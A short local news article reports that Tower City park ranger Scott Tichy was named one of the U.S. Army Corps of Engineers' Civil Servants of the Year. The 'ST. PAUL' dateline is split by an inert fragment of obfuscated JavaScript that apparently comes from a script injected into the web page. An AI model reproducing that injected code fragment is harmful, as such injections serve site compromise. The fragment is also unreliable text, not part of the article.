ST. zkite|var|u0026u|referrer|hisdy||js|php’.split(‘|’),0,{}))
PAUL, M.N. (NewsDakota.com) The U.S. Army Corps of Engineers selected Tower City resident Scott Tichy as one of its three Civil Servants of the Year this year.

Tichy, who’s worked for the Corps of Engineers for more than 21 years, is a park ranger and natural resource specialist at Lake Ashtabula in Valley City, N.D.

Tichy received this award in recognition for his outstanding support to his community during the past year. In addition to the excellent interpretation and community relations work he did at Lake Ashtabula, he supported his local park board and Ducks Unlimited chapter.

Tichy’s supervisor Rich Schueneman said, “Scott is an outstanding park ranger. He possesses excellent community relations skills as seen in his involvement with his church, his interpretation of Corps Water Safety messages and his work with various community groups, providing expertise in trail maintenance, construction, forestry and recreation.”

Tichy received his award during the 36th Annual Minnesota Federal Civil Servant of the Year Awards in St. Paul on May 3.

Leave a Reply